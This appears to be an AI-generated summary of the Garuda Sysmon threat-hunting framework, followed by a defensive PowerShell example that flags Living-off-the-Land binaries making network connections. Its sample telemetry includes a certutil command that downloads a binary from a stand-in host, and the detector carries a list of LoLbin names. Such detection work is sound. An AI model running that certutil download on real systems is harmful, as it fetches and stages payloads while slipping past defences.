🤖 AI Summary
The Garuda Threat Hunting Framework, unveiled at DEF CON 2025, is a cutting-edge PowerShell tool designed to enhance manual threat hunting capabilities. By allowing users to efficiently correlate, filter, and investigate Sysmon events, Garuda streamlines the process of identifying potential security threats. The release includes a practical demonstration of its installation, core features, and a guided hunting exercise through a Living-off-the-Land (LoLbin) attack using real telemetry data.
This framework is particularly significant for the AI/ML community because it incorporates advanced techniques to facilitate endpoint investigations and to equip cybersecurity professionals with robust manual hunting skills. Notably, Garuda's integration with Large Language Models (LLMs) enables AI-driven threat detection and response, reflecting the growing use of AI in cybersecurity. This both improves investigation accuracy and shortens the time needed to respond to potential threats, paving the way for more proactive security measures in an ever-evolving threat landscape.
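To make the "correlate, filter, and investigate Sysmon events" workflow concrete, the following PowerShell is an added example, not Garuda's own code. It assumes the standard Sysmon log channel (`Microsoft-Windows-Sysmon/Operational`) and Sysmon's EventData field names, correlates process-create events (ID 1) with network-connect events (ID 3) by `ProcessGuid`, walks the parent chain, and flags Living-off-the-Land binaries that opened an outbound connection. The sample events, the LoLbin list and the `Get-SysmonEvent`/`Find-LolbinNetworkActivity` function names are constructed for this example.

```powershell
# Added example, not Garuda's code: correlate Sysmon ID 1 (process create) and
# ID 3 (network connect) by ProcessGuid and flag LoLbins with network activity.

# Constructed sample telemetry; field names follow Sysmon's EventData names.
$SampleEvents = @(
    [pscustomobject]@{ EventId = 1; TimeCreated = [datetime]'2025-08-08T10:00:00'; ProcessGuid = '{G1}'; ParentProcessGuid = '{G0}'; Image = 'C:\Windows\explorer.exe'; CommandLine = 'explorer.exe'; ParentImage = 'C:\Windows\System32\userinit.exe' }
    [pscustomobject]@{ EventId = 1; TimeCreated = [datetime]'2025-08-08T10:01:00'; ProcessGuid = '{G2}'; ParentProcessGuid = '{G1}'; Image = 'C:\Program Files\Microsoft Office\WINWORD.EXE'; CommandLine = 'WINWORD.EXE invoice.docm'; ParentImage = 'C:\Windows\explorer.exe' }
    [pscustomobject]@{ EventId = 1; TimeCreated = [datetime]'2025-08-08T10:01:30'; ProcessGuid = '{G3}'; ParentProcessGuid = '{G2}'; Image = 'C:\Windows\System32\certutil.exe'; CommandLine = 'certutil.exe -urlcache -f http://example.invalid/a.bin a.bin'; ParentImage = 'C:\Program Files\Microsoft Office\WINWORD.EXE' }
    [pscustomobject]@{ EventId = 3; TimeCreated = [datetime]'2025-08-08T10:01:31'; ProcessGuid = '{G3}'; Image = 'C:\Windows\System32\certutil.exe'; DestinationIp = '203.0.113.7'; DestinationPort = 80 }
    [pscustomobject]@{ EventId = 1; TimeCreated = [datetime]'2025-08-08T10:02:00'; ProcessGuid = '{G4}'; ParentProcessGuid = '{G1}'; Image = 'C:\Windows\System32\rundll32.exe'; CommandLine = 'rundll32.exe shell32.dll,Control_RunDLL'; ParentImage = 'C:\Windows\explorer.exe' }
)

function Get-SysmonEvent {
    # Live collection on a Windows host with Sysmon installed (hypothetical helper);
    # the log name is Sysmon's standard event channel.
    param([int[]]$Id = @(1, 3), [datetime]$StartTime = (Get-Date).AddHours(-24))
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = $Id; StartTime = $StartTime } -ErrorAction Stop |
        ForEach-Object {
            # Flatten the EventData <Data Name="..."> nodes into a name/value table.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                EventId = $_.Id; TimeCreated = $_.TimeCreated
                ProcessGuid = $data['ProcessGuid']; ParentProcessGuid = $data['ParentProcessGuid']
                Image = $data['Image']; CommandLine = $data['CommandLine']; ParentImage = $data['ParentImage']
                DestinationIp = $data['DestinationIp']; DestinationPort = $data['DestinationPort']
            }
        }
}

function Get-ProcessChain {
    # Walk ParentProcessGuid links back through the ID 1 events, oldest ancestor first.
    param([object[]]$Events, [string]$ProcessGuid)
    $byGuid = @{}
    foreach ($e in $Events) { if ($e.EventId -eq 1) { $byGuid[$e.ProcessGuid] = $e } }
    $chain = New-Object System.Collections.Generic.List[string]
    $guid  = $ProcessGuid
    while ($guid -and $byGuid.ContainsKey($guid)) {
        $chain.Insert(0, [System.IO.Path]::GetFileName($byGuid[$guid].Image))
        $guid = $byGuid[$guid].ParentProcessGuid   # stops when the parent predates the capture
    }
    return ($chain -join ' -> ')
}

function Find-LolbinNetworkActivity {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        # Constructed starter list; extend it with the LoLbins relevant to your estate.
        [string[]]$Lolbins = @('certutil.exe', 'rundll32.exe', 'regsvr32.exe', 'mshta.exe', 'bitsadmin.exe')
    )
    # Index network-connect events by the originating process GUID.
    $netByGuid = @{}
    foreach ($e in $Events) {
        if ($e.EventId -ne 3) { continue }
        if (-not $netByGuid.ContainsKey($e.ProcessGuid)) { $netByGuid[$e.ProcessGuid] = New-Object System.Collections.Generic.List[object] }
        $netByGuid[$e.ProcessGuid].Add($e)
    }
    foreach ($p in ($Events | Where-Object { $_.EventId -eq 1 })) {
        $name = [System.IO.Path]::GetFileName($p.Image).ToLowerInvariant()
        if ($Lolbins -notcontains $name) { continue }                   # not a LoLbin
        if (-not $netByGuid.ContainsKey($p.ProcessGuid)) { continue }   # LoLbin, but no network activity
        foreach ($c in $netByGuid[$p.ProcessGuid]) {
            [pscustomobject]@{
                Time        = $p.TimeCreated
                Chain       = Get-ProcessChain -Events $Events -ProcessGuid $p.ProcessGuid
                CommandLine = $p.CommandLine
                Destination = "$($c.DestinationIp):$($c.DestinationPort)"
            }
        }
    }
}

# Run against the constructed sample; on a live host pass (Get-SysmonEvent) instead.
Find-LolbinNetworkActivity -Events $SampleEvents | Format-Table -AutoSize
```

On the sample data this reports a single row for `certutil.exe` with the chain `explorer.exe -> WINWORD.EXE -> certutil.exe` and the destination `203.0.113.7:80`; the `rundll32.exe` launch is a LoLbin too but never connected, so it is left out, which is the point of keying the join on `ProcessGuid` rather than on image name alone.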